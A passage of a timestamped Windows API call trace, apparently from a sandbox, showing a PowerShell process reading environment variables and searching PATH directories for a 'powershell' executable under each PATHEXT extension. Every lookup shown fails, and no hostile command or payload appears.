	[0355.206] VirtualQuery (in: lpAddress=0x1c6cdb20, lpBuffer=0x1c6ce9e0, dwLength=0x30 | out: lpBuffer=0x1c6ce9e0*(BaseAddress=0x1c6cd000, AllocationBase=0x1bd40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.209] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.209] CoTaskMemFree (pv=0x34f1b0) 
	[0355.212] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.212] CoTaskMemFree (pv=0x34f1b0) 
	[0355.215] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.215] CoTaskMemFree (pv=0x34f1b0) 
	[0355.224] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.224] CoTaskMemFree (pv=0x34f1b0) 
	[0355.227] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.227] CoTaskMemFree (pv=0x34f1b0) 
	[0355.228] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.228] CoTaskMemFree (pv=0x34f1b0) 
	[0355.359] VirtualQuery (in: lpAddress=0x1c6cddd0, lpBuffer=0x1c6cec90, dwLength=0x30 | out: lpBuffer=0x1c6cec90*(BaseAddress=0x1c6cd000, AllocationBase=0x1bd40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.360] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.360] CoTaskMemFree (pv=0x34f1b0) 
	[0355.363] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.363] CoTaskMemFree (pv=0x34f1b0) 
	[0355.363] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.363] CoTaskMemFree (pv=0x34f1b0) 
	[0355.365] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.365] CoTaskMemFree (pv=0x34f1b0) 
	[0355.369] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.369] CoTaskMemFree (pv=0x34f1b0) 
	[0355.504] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.504] CoTaskMemFree (pv=0x34f1b0) 
	[0355.506] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.506] CoTaskMemFree (pv=0x34f1b0) 
	[0355.507] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.507] CoTaskMemFree (pv=0x34f1b0) 
	[0355.510] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.510] CoTaskMemFree (pv=0x34f1b0) 
	[0355.511] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.511] CoTaskMemFree (pv=0x34f1b0) 
	[0355.513] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.513] CoTaskMemFree (pv=0x34f1b0) 
	[0355.515] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.515] CoTaskMemFree (pv=0x34f1b0) 
	[0355.627] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.627] CoTaskMemFree (pv=0x34f1b0) 
	[0355.835] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.835] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0355.835] CoTaskMemFree (pv=0x34f1b0) 
	[0355.838] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0355.838] CoTaskMemFree (pv=0x34f1b0) 
	[0355.838] CoTaskMemAlloc (cb=0x128) returned 0x1b79d0a0
	[0355.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b79d0a0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0355.838] CoTaskMemFree (pv=0x1b79d0a0) 
	[0355.843] CoTaskMemAlloc (cb=0x20e) returned 0x1b78f4a0
	[0355.843] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b78f4a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0355.843] CoTaskMemFree (pv=0x1b78f4a0) 
	[0355.847] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0355.848] SetErrorMode (uMode=0x1) returned 0x1
	[0355.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0355.990] SetErrorMode (uMode=0x1) returned 0x1
	[0355.991] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0355.992] SetErrorMode (uMode=0x1) returned 0x1
	[0355.992] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.001] SetErrorMode (uMode=0x1) returned 0x1
	[0356.002] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.002] SetErrorMode (uMode=0x1) returned 0x1
	[0356.003] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.011] SetErrorMode (uMode=0x1) returned 0x1
	[0356.013] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.013] SetErrorMode (uMode=0x1) returned 0x1
	[0356.013] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.021] SetErrorMode (uMode=0x1) returned 0x1
	[0356.023] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.023] SetErrorMode (uMode=0x1) returned 0x1
	[0356.023] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.157] SetErrorMode (uMode=0x1) returned 0x1
	[0356.159] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.159] SetErrorMode (uMode=0x1) returned 0x1
	[0356.159] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.167] SetErrorMode (uMode=0x1) returned 0x1
	[0356.169] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.169] SetErrorMode (uMode=0x1) returned 0x1
	[0356.169] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.177] SetErrorMode (uMode=0x1) returned 0x1
	[0356.178] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.178] SetErrorMode (uMode=0x1) returned 0x1
	[0356.178] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.332] SetErrorMode (uMode=0x1) returned 0x1
	[0356.333] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.334] SetErrorMode (uMode=0x1) returned 0x1
	[0356.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.342] SetErrorMode (uMode=0x1) returned 0x1
	[0356.343] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.343] SetErrorMode (uMode=0x1) returned 0x1
	[0356.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.352] SetErrorMode (uMode=0x1) returned 0x1
	[0356.353] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.353] SetErrorMode (uMode=0x1) returned 0x1
	[0356.353] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.364] SetErrorMode (uMode=0x1) returned 0x1
	[0356.365] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.365] SetErrorMode (uMode=0x1) returned 0x1
	[0356.365] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.467] SetErrorMode (uMode=0x1) returned 0x1
	[0356.468] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.468] SetErrorMode (uMode=0x1) returned 0x1
	[0356.469] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.476] SetErrorMode (uMode=0x1) returned 0x1
	[0356.478] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.478] SetErrorMode (uMode=0x1) returned 0x1
	[0356.478] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.486] SetErrorMode (uMode=0x1) returned 0x1
	[0356.487] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0356.487] SetErrorMode (uMode=0x1) returned 0x1
	[0356.487] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.495] SetErrorMode (uMode=0x1) returned 0x1
	[0356.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.497] SetErrorMode (uMode=0x1) returned 0x1
	[0356.497] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.497] SetErrorMode (uMode=0x1) returned 0x1
	[0356.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.498] SetErrorMode (uMode=0x1) returned 0x1
	[0356.498] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.498] SetErrorMode (uMode=0x1) returned 0x1
	[0356.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.498] SetErrorMode (uMode=0x1) returned 0x1
	[0356.498] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.499] SetErrorMode (uMode=0x1) returned 0x1
	[0356.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.499] SetErrorMode (uMode=0x1) returned 0x1
	[0356.499] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.499] SetErrorMode (uMode=0x1) returned 0x1
	[0356.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.500] SetErrorMode (uMode=0x1) returned 0x1
	[0356.500] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.500] SetErrorMode (uMode=0x1) returned 0x1
	[0356.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.500] SetErrorMode (uMode=0x1) returned 0x1
